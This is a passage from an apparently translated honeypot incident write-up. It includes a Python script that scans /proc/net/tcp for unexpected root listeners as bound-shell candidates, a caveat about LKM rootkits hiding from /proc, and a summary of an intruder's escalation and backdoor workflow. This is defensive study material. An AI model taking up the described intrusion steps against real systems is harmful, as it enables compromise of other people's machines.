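TCP_LISTEN = "0A"          # socket state code used in /proc/net/tcp
# Ports this honeypot is expected to serve (assumption for the example).
EXPECTED_PORTS = frozenset({21, 22, 23, 25, 79, 513, 514})


def parse_listeners(text):
    """Return [(port, uid, inode)] for every LISTEN socket in /proc/net/tcp text."""
    listeners = []
    for line in text.splitlines()[1:]:            # skip the header row
        fields = line.split()
        if len(fields) < 10 or fields[3] != TCP_LISTEN:
            continue
        port = int(fields[1].split(":")[1], 16)   # local_address is hex ip:port
        listeners.append((port, int(fields[7]), int(fields[9])))
    return listeners


def unexpected_root_listeners(text, expected=EXPECTED_PORTS):
    """Root-owned listeners outside the allow-list: candidates for a bound shell."""
    return [(port, inode) for port, uid, inode in parse_listeners(text)
            if uid == 0 and port not in expected]


def owner_pid(inode):
    """Live lookup (Linux, run as root): which process holds socket:[inode]?"""
    target = f"socket:[{inode}]"
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            for fd in os.listdir(f"/proc/{pid}/fd"):
                if os.readlink(f"/proc/{pid}/fd/{fd}") == target:
                    return int(pid)
        except OSError:                           # process exited, or not ours
            continue
    return None


if __name__ == "__main__":
    live = os.path.exists("/proc/net/tcp")
    text = open("/proc/net/tcp").read() if live else SAMPLE_PROC_NET_TCP
    for port, inode in unexpected_root_listeners(text):
        pid = owner_pid(inode) if live else None
        print(f"root listener on tcp/{port}, socket inode {inode}, pid {pid}")
```

One caveat that this very incident illustrates: an LKM rootkit such as adore can hide processes and files from /proc, so a clean answer from this script on a host where a kernel module may have been loaded proves little. Compare its output with a port scan from another machine, or inspect the disk from a known-good boot.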
After that I got in touch with the friend over MSN. He said the planned show had been performed, so I killed the telnetd overflow program that should long since have died, patched up the scar-covered honeypot and put her back online, and backed up the intrusion logs, keeping his handle for future blackmail :)

8. Summary

This article introduced one method of luring intruders, and analysed in detail the exercise an uninvited friend performed on the result: hiding his real IP behind a springboard, three local privilege-escalation attempts before success, installing two LKM backdoors, and attacking other machines from here as a springboard. This is a typical intruder's workflow. By analysing the details of these behaviours we can learn more about backdoor programs and overflow exploits, about how intruders troubleshoot when something fails, and even about personal habits and other interesting things.